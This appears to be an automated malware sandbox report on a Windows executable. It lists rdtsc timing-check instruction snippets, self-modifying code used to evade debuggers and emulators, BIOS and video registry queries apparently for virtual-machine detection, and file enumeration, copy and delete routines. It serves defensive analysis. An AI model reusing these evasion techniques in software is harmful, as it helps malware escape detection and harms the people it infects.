                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4A91 second address: FE4A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5008 second address: FE501F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FB958FCD452h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE501F second address: FE5025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5025 second address: FE502F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB958FCD446h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE502F second address: FE503B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5351 second address: FE5356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5356 second address: FE535C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED839 second address: FED83E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED992 second address: FED996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FED996 second address: FED9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDB66 second address: FEDB6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDB6A second address: FEDB74 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB958FCD446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDCE7 second address: FEDCF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FB958B07016h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEDE5D second address: FEDE6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEE0C9 second address: FEE103 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB958B07031h 0x00000008 jmp 00007FB958B07029h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB958B07025h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F04B second address: F3F051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6B1A second address: FF6B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6B1E second address: FF6B33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6B33 second address: FF6B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6E62 second address: FF6E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB958FCD44Dh 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6E7B second address: FF6E81 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6E81 second address: FF6EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB958FCD459h 0x0000000b push edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FB958FCD446h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7008 second address: FF7013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FB958B07016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF758E second address: FF7592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7592 second address: FF759C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF759C second address: FF75C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB958FCD459h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF775E second address: FF7767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7767 second address: FF777B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF777B second address: FF7781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF7FD3 second address: FF7FFC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB958FCD446h 0x00000008 jp 00007FB958FCD446h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FB958FCD459h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF86FD second address: FF870F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF870F second address: FF8715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8715 second address: FF8726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958B0701Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8726 second address: FF872A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF872A second address: FF872E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF872E second address: FF873C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C533 second address: 100C539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C539 second address: 100C53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C53D second address: 100C549 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C549 second address: 100C57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB958FCD450h 0x0000000a jo 00007FB958FCD461h 0x00000010 jmp 00007FB958FCD455h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C0D3 second address: 100C0E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C0E3 second address: 100C0EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100C0EB second address: 100C0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100E2D8 second address: 100E302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FB958FCD446h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FB958FCD456h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A078 second address: F3A07F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A07F second address: F3A085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3A085 second address: F3A093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102350B second address: 1023510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CD02 second address: 102CD08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CD08 second address: 102CD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CD0C second address: 102CD10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CD10 second address: 102CD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B888 second address: 102B88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B88E second address: 102B8AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007FB958FCD455h 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BDAB second address: 102BDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB958B0701Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BDB7 second address: 102BDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FB958FCD455h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BF18 second address: 102BF24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FB958B07016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C094 second address: 102C099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102C099 second address: 102C0A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FB958B07016h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CA79 second address: 102CA7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1032FA2 second address: 1032FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C42C second address: 103C43A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C43A second address: 103C444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C444 second address: 103C46B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FB958FCD446h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jl 00007FB958FCD448h 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e push esi 0x0000001f pop esi 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C46B second address: 103C471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103C471 second address: 103C47F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB958FCD446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104517A second address: 10451D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB958B0701Fh 0x00000008 jmp 00007FB958B07026h 0x0000000d pop esi 0x0000000e pushad 0x0000000f jmp 00007FB958B0701Ah 0x00000014 jmp 00007FB958B0701Ch 0x00000019 jnl 00007FB958B07016h 0x0000001f popad 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push ecx 0x00000023 jng 00007FB958B07022h 0x00000029 jo 00007FB958B07016h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1044FE2 second address: 1044FF7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB958FCD446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jbe 00007FB958FCD456h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10616BF second address: 10616C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061C4C second address: 1061C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB958FCD446h 0x0000000a jo 00007FB958FCD446h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061E1D second address: 1061E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB958B07016h 0x0000000a pop edx 0x0000000b ja 00007FB958B07033h 0x00000011 push esi 0x00000012 jnc 00007FB958B07016h 0x00000018 pop esi 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061E5A second address: 1061E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1062153 second address: 1062166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FB958B07016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10667F8 second address: 1066819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 or dl, 00000052h 0x0000000c push 00000004h 0x0000000e cld 0x0000000f push AB87BBC9h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB958FCD44Bh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068005 second address: 1068019 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB958B07016h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jc 00007FB958B07016h 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068019 second address: 1068032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958FCD455h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068032 second address: 1068036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068036 second address: 106803C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106803C second address: 1068046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068046 second address: 106804C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106804C second address: 1068081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B0701Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB958B07020h 0x00000012 jmp 00007FB958B0701Fh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068081 second address: 1068088 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1068088 second address: 10680A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FB958B0701Eh 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20327 second address: 4F20353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB958FCD44Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F203D0 second address: 4F203E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958B07024h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F203E8 second address: 4F203EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7E39F second address: F7E3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DD1D31 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DD1C95 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F99A69 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1000612 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00B838B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B84910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B84910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00B7DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00B7E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00B7ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B84570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00B84570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B7F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B83EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00B83EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B716D0
